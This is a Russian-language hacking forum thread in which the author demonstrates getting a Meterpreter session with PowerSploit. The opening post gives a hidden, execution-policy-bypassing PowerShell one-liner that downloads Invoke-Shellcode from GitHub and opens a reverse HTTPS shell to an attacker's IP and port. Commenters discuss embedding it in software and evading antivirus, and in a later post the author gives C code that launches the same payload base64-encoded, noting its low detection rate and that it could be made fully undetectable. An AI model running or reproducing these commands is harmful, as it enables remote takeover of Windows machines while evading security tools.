PowerShell для хакера (часть I )

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ~~DarkNode~~, 24 ноя 2016.

Наш партнер Genesis Hackspace
  1. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Часть 1
    Следующая часть
    Все части

    Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
    И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

    Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

    PowerShell для хакера (часть I )

    Для начало сходим на гитхаб по ссылке:
    Код (Text):
    https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
    PowerShell для хакера (часть I )

    Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде
    Код (Text):
    https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
    Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

    PowerShell для хакера (часть I )

    Копируем урл нашего скрипта и готовим следующую команду:
    Код (Text):
    Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
    Собственно вызов нашего скрипта после его загрузки с параметрами (IP аддрес и порт Атакуещей машини) и тип пейлоада метасплоита.
    PowerShell для хакера (часть I )

    PowerShell для хакера (часть I )

    Собственно говоря и все)

    Запускаем данную команду и к нам прилетает метерпретер сессия)
    Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

    Всем спасибо) Продолжения следует)


    Следующая часть
    Все части
     
    Mixa, SenkaRazin, smDef и 6 другим нравится это.
  2. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Регистрация:
    7 сен 2016
    Сообщения:
    175
    Симпатии:
    125
    добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?
     
    Mixa и Vander нравится это.
  3. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    796
    Присоединяюсь к вопросу...
     
    pappa и ~~DarkNode~~ нравится это.
  4. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Завтра сделаю тест на детект.Сорри сегодня не успеваю)
     
    Mixa и pappa нравится это.
  5. D8mbsniper

    D8mbsniper New Member

    Регистрация:
    25 ноя 2016
    Сообщения:
    4
    Симпатии:
    1
    Неплохо.
    Думаю такой скрипт с rubberducky должен "подружиться" :)
     
    m0tion нравится это.
  6. pappa

    pappa Member

    Регистрация:
    21 сен 2016
    Сообщения:
    11
    Симпатии:
    2
    я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?o_O
     
  7. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Регистрация:
    7 сен 2016
    Сообщения:
    175
    Симпатии:
    125
    не обязательно...
     
  8. ipmann

    ipmann New Member

    Регистрация:
    23 окт 2016
    Сообщения:
    1
    Симпатии:
    0
    Symantec Endpoint Protection 12 этот скрипт прибивает.. :(
     
  9. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Регистрация:
    7 сен 2016
    Сообщения:
    175
    Симпатии:
    125
    Добрый день, ну не во всех же стоит Symantec Endpoint Protection,какие то скрипты будут пробиваться..)
     
  10. suckmydick

    suckmydick Member

    Регистрация:
    15 сен 2016
    Сообщения:
    5
    Симпатии:
    2
    а как открыть скрытый текст?
     
    6otfa нравится это.
  11. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))
     
  12. InK

    InK New Member

    Регистрация:
    4 дек 2016
    Сообщения:
    4
    Симпатии:
    0
    Огромное спасибо за статью, искал нечто подобное.
     
  13. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    26
    Пожалуйста напиши статью как проходил лабораторию.
     
    6otfa и ~~DarkNode~~ нравится это.
  14. fumpc18

    fumpc18 New Member

    Регистрация:
    6 дек 2016
    Сообщения:
    1
    Симпатии:
    0
    Спасибо за статью,не подкинете пару книг по powershell?
     
  15. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
    Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
    Если кому то будет интересно,то конечно могу)
     
    Hiedwar, Mixa, TrevorReznik и 2 другим нравится это.
  16. valerian38

    valerian38 Well-Known Member

    Регистрация:
    20 июл 2016
    Сообщения:
    88
    Симпатии:
    35
    Если вы это сделаете, то я буду самым счастливым человеком на свете.
     
  17. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    WebWare Team и valerian38 нравится это.
  18. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Обычно в этих целях его чаще используют)))
     
  19. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    D8mbsniper нравится это.
  20. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    PowerShell для хакера (часть I )
    Тестанул вот на детект,весьма не плохо, 2/35 (правда аваспом палится) Но можно в принципе достич и фуда (FuD) если небольшие манипуляции сделать


    Код (C):
    #include <stdlib.h>

    int main() {
        system("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADIALgAxADAAMgAgAC0ATABwAG8AcgB0ACAAMQAzADMANwAgAC0ARgBvAHIAYwBlAA==");
        return 0;
    }
     
    #20 ~~DarkNode~~, 14 дек 2016
    Последнее редактирование: 14 дек 2016
    valerian38 и NSIS нравится это.
Загрузка...
Похожие Темы - PowerShell для хакера
  1. ~~DarkNode~~
    Ответов:
    6
    Просмотров:
    1.296
  2. ~~DarkNode~~
    Ответов:
    0
    Просмотров:
    551
  3. ~~DarkNode~~
    Ответов:
    2
    Просмотров:
    815
  4. ~~DarkNode~~
    Ответов:
    7
    Просмотров:
    848
  5. ~~DarkNode~~
    Ответов:
    21
    Просмотров:
    1.499

Поделиться этой страницей